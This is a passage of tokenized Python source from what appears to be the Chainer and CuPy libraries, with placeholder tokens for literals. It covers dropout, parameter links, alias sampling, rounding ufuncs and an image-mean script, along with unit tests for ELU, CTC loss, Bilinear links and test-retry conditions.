] * self . mask , <EOL> def dropout ( x , ratio = <NUM_LIT> , train = True ) : <EOL> """<STR_LIT>""" <EOL> if train : <EOL> return Dropout ( ratio ) ( x ) <EOL> return x </s>
<s> from chainer import cuda <EOL> from chainer . functions . math import identity <EOL> from chainer import link <EOL> class Parameter ( link . Link ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , array ) : <EOL> super ( Parameter , self ) . __init__ ( ) <EOL> self . add_param ( '<STR_LIT>' , array . shape , dtype = array . dtype ) <EOL> self . W . data = array <EOL> if isinstance ( array , cuda . ndarray ) : <EOL> self . to_gpu ( array ) <EOL> def __call__ ( self , volatile = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> W = identity . identity ( self . W ) <EOL> W . volatile = volatile <EOL> return identity . identity ( W ) </s>
<s> import numpy <EOL> from chainer import cuda <EOL> class WalkerAlias ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , probs ) : <EOL> prob = numpy . array ( probs , numpy . float32 ) <EOL> prob /= numpy . sum ( prob ) <EOL> threshold = numpy . ndarray ( len ( probs ) , numpy . float32 ) <EOL> values = numpy . ndarray ( len ( probs ) * <NUM_LIT:2> , numpy . int32 ) <EOL> il , ir = <NUM_LIT:0> , <NUM_LIT:0> <EOL> pairs = list ( zip ( prob , range ( len ( probs ) ) ) ) <EOL> pairs . sort ( ) <EOL> for prob , i in pairs : <EOL> p = prob * len ( probs ) <EOL> while p > <NUM_LIT:1> and ir < il : <EOL> values [ ir * <NUM_LIT:2> + <NUM_LIT:1> ] = i <EOL> p -= <NUM_LIT:1.0> - threshold [ ir ] <EOL> ir += <NUM_LIT:1> <EOL> threshold [ il ] = p <EOL> values [ il * <NUM_LIT:2> ] = i <EOL> il += <NUM_LIT:1> <EOL> for i in range ( ir , len ( probs ) ) : <EOL> values [ i * <NUM_LIT:2> + <NUM_LIT:1> ] = <NUM_LIT:0> <EOL> assert ( ( values < len ( threshold ) ) . all ( ) ) <EOL> self . threshold = threshold <EOL> self . values = values <EOL> self . use_gpu = False <EOL> def to_gpu ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . use_gpu : <EOL> self . threshold = cuda . to_gpu ( self . threshold ) <EOL> self . values = cuda . to_gpu ( self . values ) <EOL> self . use_gpu = True <EOL> def to_cpu ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_gpu : <EOL> self . threshold = cuda . to_cpu ( self . threshold ) <EOL> self . values = cuda . to_cpu ( self . values ) <EOL> self . use_gpu = False <EOL> def sample ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> if self . use_gpu : <EOL> return self . sample_gpu ( shape ) <EOL> else : <EOL> return self . sample_cpu ( shape ) <EOL> def sample_cpu ( self , shape ) : <EOL> ps = numpy . random . uniform ( <NUM_LIT:0> , <NUM_LIT:1> , shape ) <EOL> pb = ps * len ( self . threshold ) <EOL> index = pb . astype ( numpy . int32 ) <EOL> left_right = ( self . threshold [ index ] < pb - index ) . astype ( numpy . 
int32 ) <EOL> return self . values [ index * <NUM_LIT:2> + left_right ] <EOL> def sample_gpu ( self , shape ) : <EOL> ps = cuda . cupy . random . uniform ( size = shape , dtype = numpy . float32 ) <EOL> vs = cuda . elementwise ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' <EOL> ) ( ps , self . threshold , self . values , len ( self . threshold ) ) <EOL> return vs </s>
<s> </s>
<s> from cupy . math import ufunc <EOL> rint = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) <EOL> floor = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) <EOL> ceil = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) <EOL> trunc = ufunc . create_math_ufunc ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '''<STR_LIT>''' ) </s>
<s> import argparse <EOL> import os <EOL> import sys <EOL> import numpy <EOL> from PIL import Image <EOL> import six . moves . cPickle as pickle <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT:.>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> sum_image = None <EOL> count = <NUM_LIT:0> <EOL> for line in open ( args . dataset ) : <EOL> filepath = os . path . join ( args . root , line . strip ( ) . split ( ) [ <NUM_LIT:0> ] ) <EOL> image = numpy . asarray ( Image . open ( filepath ) ) . transpose ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> if sum_image is None : <EOL> sum_image = numpy . ndarray ( image . shape , dtype = numpy . float32 ) <EOL> sum_image [ : ] = image <EOL> else : <EOL> sum_image += image <EOL> count += <NUM_LIT:1> <EOL> sys . stderr . write ( '<STR_LIT>' . format ( count ) ) <EOL> sys . stderr . flush ( ) <EOL> sys . stderr . write ( '<STR_LIT:\n>' ) <EOL> mean = sum_image / count <EOL> pickle . dump ( mean , open ( args . output , '<STR_LIT:wb>' ) , - <NUM_LIT:1> ) </s>
<s> import random <EOL> import unittest <EOL> import numpy <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import functions <EOL> from chainer import gradient_check <EOL> from chainer import testing <EOL> from chainer . testing import attr <EOL> from chainer . testing import condition <EOL> class TestELU ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . x = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:5> , <NUM_LIT:4> ) ) . astype ( numpy . float32 ) <EOL> for i in range ( self . x . size ) : <EOL> if - <NUM_LIT> < self . x . flat [ i ] < <NUM_LIT> : <EOL> self . x . flat [ i ] = <NUM_LIT:0.5> <EOL> self . gy = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:5> , <NUM_LIT:4> ) ) . astype ( numpy . float32 ) <EOL> self . alpha = random . random ( ) <EOL> def check_forward ( self , x_data ) : <EOL> x = chainer . Variable ( x_data ) <EOL> y = functions . elu ( x , alpha = self . alpha ) <EOL> self . assertEqual ( y . data . dtype , numpy . float32 ) <EOL> expected = self . x . copy ( ) <EOL> for i in numpy . ndindex ( self . x . shape ) : <EOL> if self . x [ i ] < <NUM_LIT:0> : <EOL> expected [ i ] = self . alpha * ( numpy . exp ( expected [ i ] ) - <NUM_LIT:1> ) <EOL> gradient_check . assert_allclose ( expected , y . data ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_cpu ( self ) : <EOL> self . check_forward ( self . x ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_gpu ( self ) : <EOL> self . check_forward ( cuda . to_gpu ( self . x ) ) <EOL> def check_backward ( self , x_data , y_grad ) : <EOL> gradient_check . check_backward ( <EOL> functions . ELU ( self . alpha ) , x_data , y_grad ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> self . check_backward ( self . x , self . gy ) <EOL> @ attr . gpu <EOL> @ condition . 
retry ( <NUM_LIT:3> ) <EOL> def test_backward_gpu ( self ) : <EOL> self . check_backward ( cuda . to_gpu ( self . x ) , cuda . to_gpu ( self . gy ) ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import math <EOL> import unittest <EOL> import numpy <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import functions <EOL> from chainer import gradient_check <EOL> from chainer import testing <EOL> from chainer . testing import attr <EOL> from chainer . testing import condition <EOL> class TestCTC ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . x = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ) ) . astype ( numpy . float32 ) <EOL> self . t = numpy . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) . astype ( numpy . int32 ) <EOL> self . l = numpy . array ( [ [ <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> ] ] ) . astype ( numpy . int32 ) <EOL> self . blank_symbol = <NUM_LIT:2> <EOL> self . x_length = numpy . full ( ( len ( self . x [ <NUM_LIT:0> ] ) , ) , len ( self . x ) , dtype = '<STR_LIT:i>' ) <EOL> self . l_length = numpy . full ( ( len ( self . t ) , ) , len ( self . t [ <NUM_LIT:0> ] ) , dtype = '<STR_LIT:i>' ) <EOL> self . use_length = True <EOL> def alpha ( self , x , l , t , u ) : <EOL> if u < <NUM_LIT:0> : <EOL> return <NUM_LIT:0.0> <EOL> if t == <NUM_LIT:0> : <EOL> if u == <NUM_LIT:0> : <EOL> return x [ <NUM_LIT:0> ] [ self . blank_symbol ] <EOL> elif u == <NUM_LIT:1> : <EOL> return x [ <NUM_LIT:0> ] [ l [ <NUM_LIT:1> ] ] <EOL> else : <EOL> return <NUM_LIT:0.0> <EOL> elif l [ u ] == self . blank_symbol or l [ u ] == l [ u - <NUM_LIT:2> ] : <EOL> return ( x [ t ] [ l [ u ] ] * <EOL> ( self . alpha ( x , l , t - <NUM_LIT:1> , u - <NUM_LIT:1> ) + <EOL> self . alpha ( x , l , t - <NUM_LIT:1> , u ) ) ) <EOL> else : <EOL> return ( x [ t ] [ l [ u ] ] * <EOL> ( self . alpha ( x , l , t - <NUM_LIT:1> , u - <NUM_LIT:2> ) + <EOL> self . alpha ( x , l , t - <NUM_LIT:1> , u - <NUM_LIT:1> ) + <EOL> self . 
alpha ( x , l , t - <NUM_LIT:1> , u ) ) ) <EOL> def check_forward ( self , t_data , xs_data , l_length , x_length ) : <EOL> x = tuple ( chainer . Variable ( x_data ) for x_data in xs_data ) <EOL> t = chainer . Variable ( t_data ) <EOL> args = ( x , t , self . blank_symbol ) <EOL> if self . use_length : <EOL> args += ( chainer . Variable ( x_length ) , chainer . Variable ( l_length ) ) <EOL> loss = functions . connectionist_temporal_classification ( * args ) <EOL> loss_value = float ( loss . data ) <EOL> xp = cuda . get_array_module ( self . x ) <EOL> xt = xp . swapaxes ( self . x , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> for b in range ( xt . shape [ <NUM_LIT:0> ] ) : <EOL> for t in range ( xt . shape [ <NUM_LIT:1> ] ) : <EOL> xt [ b ] [ t ] = numpy . exp ( xt [ b ] [ t ] ) / numpy . sum ( numpy . exp ( xt [ b ] [ t ] ) ) <EOL> loss_expect = <NUM_LIT:0> <EOL> batch_size = xt . shape [ <NUM_LIT:0> ] <EOL> path_length = <NUM_LIT:2> * l_length + <NUM_LIT:1> <EOL> for xtb , lb , xlb , plb in zip ( xt , self . l , x_length , path_length ) : <EOL> loss_expect += - math . log ( <EOL> self . alpha ( xtb , lb , int ( xlb - <NUM_LIT:1> ) , int ( plb - <NUM_LIT:1> ) ) + <EOL> self . alpha ( xtb , lb , int ( xlb - <NUM_LIT:1> ) , int ( plb - <NUM_LIT:2> ) ) ) <EOL> loss_expect /= batch_size <EOL> self . assertAlmostEqual ( loss_expect , loss_value , places = <NUM_LIT:5> ) <EOL> def test_forward_cpu ( self ) : <EOL> self . check_forward ( self . t , tuple ( self . x ) , <EOL> self . l_length , self . x_length ) <EOL> @ attr . gpu <EOL> def test_forward_gpu ( self ) : <EOL> self . check_forward ( cuda . to_gpu ( self . t ) , <EOL> tuple ( cuda . to_gpu ( x_data ) for x_data in self . x ) , <EOL> cuda . to_gpu ( self . l_length ) , <EOL> cuda . to_gpu ( self . x_length ) ) <EOL> def check_backward ( self , t_data , xs_data , l_length , x_length ) : <EOL> gradient_check . check_backward ( <EOL> functions . ConnectionistTemporalClassification ( self . 
blank_symbol ) , <EOL> ( x_length , l_length , t_data ) + xs_data , None , eps = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> self . check_backward ( self . t , tuple ( self . x ) , <EOL> self . l_length , self . x_length ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> @ attr . gpu <EOL> def test_backward_gpu ( self ) : <EOL> self . check_backward ( cuda . to_gpu ( self . t ) , <EOL> tuple ( cuda . to_gpu ( x_data ) for x_data in self . x ) , <EOL> cuda . to_gpu ( self . l_length ) , <EOL> cuda . to_gpu ( self . x_length ) ) <EOL> class TestCTCWithoutLength ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithoutLength , self ) . setUp ( ) <EOL> self . use_length = False <EOL> class TestCTCWithLabelPadding ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithLabelPadding , self ) . setUp ( ) <EOL> self . l_length [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> class TestCTCWithInputPadding ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithInputPadding , self ) . setUp ( ) <EOL> self . x_length [ <NUM_LIT:0> ] = <NUM_LIT:3> <EOL> class TestCTCWithAllPadding ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCWithAllPadding , self ) . setUp ( ) <EOL> self . x_length [ ... ] = <NUM_LIT:3> <EOL> self . l_length [ ... ] = <NUM_LIT:1> <EOL> class TestCTCBlankSymbol ( TestCTC ) : <EOL> def setUp ( self ) : <EOL> super ( TestCTCBlankSymbol , self ) . setUp ( ) <EOL> self . x = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) ) . astype ( numpy . float32 ) <EOL> self . l = numpy . array ( [ [ <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> ] ] ) . astype ( numpy . int32 ) <EOL> self . blank_symbol = <NUM_LIT:3> <EOL> class TestCTCUseVolatile ( unittest . 
TestCase ) : <EOL> def test_volatile ( self ) : <EOL> xs_data = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ) ) . astype ( numpy . float32 ) <EOL> t_data = numpy . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) . astype ( numpy . int32 ) <EOL> x = [ chainer . Variable ( x_data , volatile = True ) for x_data in xs_data ] <EOL> t = chainer . Variable ( t_data , volatile = True ) <EOL> functions . connectionist_temporal_classification ( x , t , <NUM_LIT:2> ) <EOL> class TestCTCError ( unittest . TestCase ) : <EOL> def test_not_iterable ( self ) : <EOL> x = chainer . Variable ( numpy . zeros ( ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ) , numpy . float32 ) ) <EOL> t = chainer . Variable ( numpy . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , numpy . int32 ) ) <EOL> with self . assertRaises ( TypeError ) : <EOL> functions . connectionist_temporal_classification ( x , t , <NUM_LIT:0> ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import unittest <EOL> import numpy <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import gradient_check <EOL> from chainer import links <EOL> from chainer import testing <EOL> from chainer . testing import attr <EOL> from chainer . testing import condition <EOL> from chainer . utils import array <EOL> def _check_forward ( e1 , e2 , f , y_expect ) : <EOL> e1 = chainer . Variable ( e1 ) <EOL> e2 = chainer . Variable ( e2 ) <EOL> y = f ( e1 , e2 ) <EOL> gradient_check . assert_allclose ( y_expect , y . data ) <EOL> def _check_backward ( e1 , e2 , y_grad , link , bias ) : <EOL> params = [ link . W ] <EOL> if bias : <EOL> params . append ( link . b ) <EOL> gradient_check . check_backward ( <EOL> link , ( e1 , e2 ) , y_grad , params , eps = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def _batch_to_gpu ( * xs ) : <EOL> return tuple ( cuda . to_gpu ( x ) for x in xs ) <EOL> def _uniform ( * shape ) : <EOL> return numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , shape ) . astype ( numpy . float32 ) <EOL> class TestBilinear ( unittest . TestCase ) : <EOL> in_shape = ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> out_size = <NUM_LIT:4> <EOL> batch_size = <NUM_LIT:10> <EOL> def setUp ( self ) : <EOL> self . f = links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size ) <EOL> self . f . W . data [ ... ] = _uniform ( * self . f . W . data . shape ) <EOL> self . f . V1 . data [ ... ] = _uniform ( * self . f . V1 . data . shape ) <EOL> self . f . V2 . data [ ... ] = _uniform ( * self . f . V2 . data . shape ) <EOL> self . f . b . data [ ... ] = _uniform ( * self . f . b . data . shape ) <EOL> self . f . zerograds ( ) <EOL> self . W = self . f . W . data . copy ( ) <EOL> self . V1 = self . f . V1 . data . copy ( ) <EOL> self . V2 = self . f . V2 . data . copy ( ) <EOL> self . b = self . f . b . data . copy ( ) <EOL> self . e1 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . 
e2 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:1> ] ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> self . y = ( <EOL> numpy . einsum ( '<STR_LIT>' , self . e1 , self . e2 , self . W ) + <EOL> self . e1 . dot ( self . V1 ) + self . e2 . dot ( self . V2 ) + self . b ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_cpu ( self ) : <EOL> _check_forward ( self . e1 , self . e2 , self . f , self . y ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_forward_gpu ( self ) : <EOL> self . f . to_gpu ( ) <EOL> _check_forward ( cuda . to_gpu ( self . e1 ) , <EOL> cuda . to_gpu ( self . e2 ) , <EOL> self . f , self . y ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> _check_backward ( self . e1 , self . e2 , self . gy , self . f , True ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_gpu ( self ) : <EOL> self . f . to_gpu ( ) <EOL> _check_backward ( cuda . to_gpu ( self . e1 ) , <EOL> cuda . to_gpu ( self . e2 ) , <EOL> cuda . to_gpu ( self . gy ) , <EOL> self . f , True ) <EOL> class TestBilinear2 ( TestBilinear ) : <EOL> def setUp ( self ) : <EOL> super ( TestBilinear2 , self ) . setUp ( ) <EOL> assert self . in_shape [ <NUM_LIT:1> ] % <NUM_LIT:2> == <NUM_LIT:0> <EOL> self . e1 = _uniform ( self . batch_size , <NUM_LIT:1> , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:1> ] // <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> e1 = array . as_mat ( self . e1 ) <EOL> e2 = array . as_mat ( self . e2 ) <EOL> self . y = ( <EOL> numpy . einsum ( '<STR_LIT>' , e1 , e2 , self . W ) + <EOL> e1 . dot ( self . V1 ) + e2 . dot ( self . V2 ) + self . 
b ) <EOL> class TestBilinear3 ( TestBilinear ) : <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinear4 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> class TestBilinear5 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> class TestBilinear6 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> class TestBilinear7 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinear8 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinear9 ( TestBilinear ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias ( TestBilinear ) : <EOL> def setUp ( self ) : <EOL> self . f = links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size , True ) <EOL> W = self . f . W . data <EOL> W [ ... ] = numpy . random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> , W . shape ) <EOL> self . f . zerograds ( ) <EOL> self . W = W . copy ( ) <EOL> self . e1 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , self . in_shape [ <NUM_LIT:1> ] ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> self . y = numpy . einsum ( '<STR_LIT>' , self . e1 , self . e2 , self . W ) <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_cpu ( self ) : <EOL> _check_backward ( self . e1 , self . e2 , self . gy , self . f , False ) <EOL> @ attr . gpu <EOL> @ condition . retry ( <NUM_LIT:3> ) <EOL> def test_backward_gpu ( self ) : <EOL> self . f . to_gpu ( ) <EOL> _check_backward ( cuda . to_gpu ( self . e1 ) , cuda . to_gpu ( self . e2 ) , <EOL> cuda . to_gpu ( self . gy ) , self . f , False ) <EOL> class TestBilinearWOBias2 ( TestBilinearWOBias ) : <EOL> def setUp ( self ) : <EOL> super ( TestBilinearWOBias2 , self ) . 
setUp ( ) <EOL> assert self . in_shape [ <NUM_LIT:1> ] % <NUM_LIT:2> == <NUM_LIT:0> <EOL> self . e1 = _uniform ( self . batch_size , <NUM_LIT:1> , self . in_shape [ <NUM_LIT:0> ] ) <EOL> self . e2 = _uniform ( self . batch_size , <NUM_LIT:2> , self . in_shape [ <NUM_LIT:1> ] // <NUM_LIT:2> ) <EOL> self . gy = _uniform ( self . batch_size , self . out_size ) <EOL> e1 = array . as_mat ( self . e1 ) <EOL> e2 = array . as_mat ( self . e2 ) <EOL> self . y = numpy . einsum ( '<STR_LIT>' , e1 , e2 , self . W ) <EOL> class TestBilinearWOBias3 ( TestBilinearWOBias ) : <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias4 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> class TestBilinearWOBias5 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> class TestBilinearWOBias6 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> class TestBilinearWOBias7 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias8 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class TestBilinearWOBias9 ( TestBilinearWOBias ) : <EOL> in_shape = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> out_size = <NUM_LIT:1> <EOL> class InitByInitialParameter ( unittest . TestCase ) : <EOL> in_shape = ( <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> out_size = <NUM_LIT:4> <EOL> batch_size = <NUM_LIT:10> <EOL> def setUp ( self ) : <EOL> self . W = _uniform ( self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size ) <EOL> self . V1 = _uniform ( self . in_shape [ <NUM_LIT:0> ] , self . out_size ) <EOL> self . V2 = _uniform ( self . in_shape [ <NUM_LIT:1> ] , self . out_size ) <EOL> self . b = _uniform ( self . out_size , ) <EOL> class NormalInitialParameter ( InitByInitialParameter ) : <EOL> def check_normal ( self , initialW , initial_bias , nobias ) : <EOL> links . Bilinear ( <EOL> self . 
in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size , nobias , <EOL> initialW , initial_bias ) <EOL> def test_normal_cpu_bias ( self ) : <EOL> self . check_normal ( self . W , ( self . V1 , self . V2 , self . b ) , False ) <EOL> def test_normal_cpu_nobias ( self ) : <EOL> self . check_normal ( self . W , None , False ) <EOL> class InvalidInitialParameter ( InitByInitialParameter ) : <EOL> def setUp ( self ) : <EOL> super ( InvalidInitialParameter , self ) . setUp ( ) <EOL> self . invalidW = _uniform ( self . in_shape [ <NUM_LIT:0> ] + <NUM_LIT:1> , self . in_shape [ <NUM_LIT:1> ] , <EOL> self . out_size ) <EOL> self . invalidV1 = _uniform ( self . in_shape [ <NUM_LIT:0> ] + <NUM_LIT:1> , self . out_size ) <EOL> self . invalidV2 = _uniform ( self . in_shape [ <NUM_LIT:1> ] + <NUM_LIT:1> , self . out_size ) <EOL> self . invalidb = _uniform ( self . out_size + <NUM_LIT:1> , ) <EOL> def check_invalid ( self , initialW , initial_bias , nobias ) : <EOL> with self . assertRaises ( AssertionError ) : <EOL> links . Bilinear ( <EOL> self . in_shape [ <NUM_LIT:0> ] , self . in_shape [ <NUM_LIT:1> ] , self . out_size , nobias , <EOL> initialW , initial_bias ) <EOL> def test_invalidW_cpu ( self ) : <EOL> self . check_invalid ( self . invalidW , ( self . V1 , self . V2 , self . b ) , False ) <EOL> self . check_invalid ( self . invalidW , None , True ) <EOL> def test_invalidV1_cpu ( self ) : <EOL> self . check_invalid ( self . W , ( self . invalidV1 , self . V2 , self . b ) , False ) <EOL> def test_invalidV2_cpu ( self ) : <EOL> self . check_invalid ( self . W , ( self . V1 , self . invalidV2 , self . b ) , False ) <EOL> def test_invalidb_cpu ( self ) : <EOL> self . check_invalid ( self . W , ( self . V1 , self . V2 , self . invalidb ) , False ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import unittest <EOL> from chainer import testing <EOL> from chainer . testing import condition <EOL> class MockUnitTest ( unittest . TestCase ) : <EOL> failure_case_counter = <NUM_LIT:0> <EOL> success_case_counter = <NUM_LIT:0> <EOL> probabilistic_case_counter = <NUM_LIT:0> <EOL> probabilistic_case_success_counter = <NUM_LIT:0> <EOL> probabilistic_case_failure_counter = <NUM_LIT:0> <EOL> def failure_case ( self ) : <EOL> self . failure_case_counter += <NUM_LIT:1> <EOL> self . fail ( ) <EOL> def success_case ( self ) : <EOL> self . success_case_counter += <NUM_LIT:1> <EOL> self . assertTrue ( True ) <EOL> def error_case ( self ) : <EOL> raise Exception ( ) <EOL> def probabilistic_case ( self ) : <EOL> self . probabilistic_case_counter += <NUM_LIT:1> <EOL> if self . probabilistic_case_counter % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> self . probabilistic_case_success_counter += <NUM_LIT:1> <EOL> self . assertTrue ( True ) <EOL> else : <EOL> self . probabilistic_case_failure_counter += <NUM_LIT:1> <EOL> self . fail ( ) <EOL> def runTest ( self ) : <EOL> pass <EOL> def _should_fail ( self , f ) : <EOL> try : <EOL> f ( self . unit_test ) <EOL> self . fail ( <EOL> '<STR_LIT>' ) <EOL> except AssertionError as e : <EOL> self . assertIn ( '<STR_LIT>' , str ( e ) ) <EOL> def _should_pass ( self , f ) : <EOL> f ( self . unit_test ) <EOL> class TestRepeatWithSuccessAtLeast ( unittest . TestCase ) : <EOL> def _decorate ( self , f , times , min_success ) : <EOL> return condition . repeat_with_success_at_least ( <EOL> times , min_success ) ( f ) <EOL> def setUp ( self ) : <EOL> self . unit_test = MockUnitTest ( ) <EOL> def test_all_trials_fail ( self ) : <EOL> f = self . _decorate ( MockUnitTest . failure_case , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> _should_fail ( self , f ) <EOL> self . assertEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_all_trials_fail2 ( self ) : <EOL> f = self . _decorate ( MockUnitTest . 
failure_case , <NUM_LIT:10> , <NUM_LIT:0> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_all_trials_error ( self ) : <EOL> f = self . _decorate ( MockUnitTest . error_case , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> _should_fail ( self , f ) <EOL> def test_all_trials_succeed ( self ) : <EOL> f = self . _decorate ( MockUnitTest . success_case , <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertEqual ( self . unit_test . success_case_counter , <NUM_LIT:10> ) <EOL> def test_all_trials_succeed2 ( self ) : <EOL> self . assertRaises ( AssertionError , <EOL> condition . repeat_with_success_at_least , <EOL> <NUM_LIT:10> , <NUM_LIT:11> ) <EOL> def test_half_of_trials_succeed ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> , <NUM_LIT:5> ) <EOL> _should_pass ( self , f ) <EOL> self . 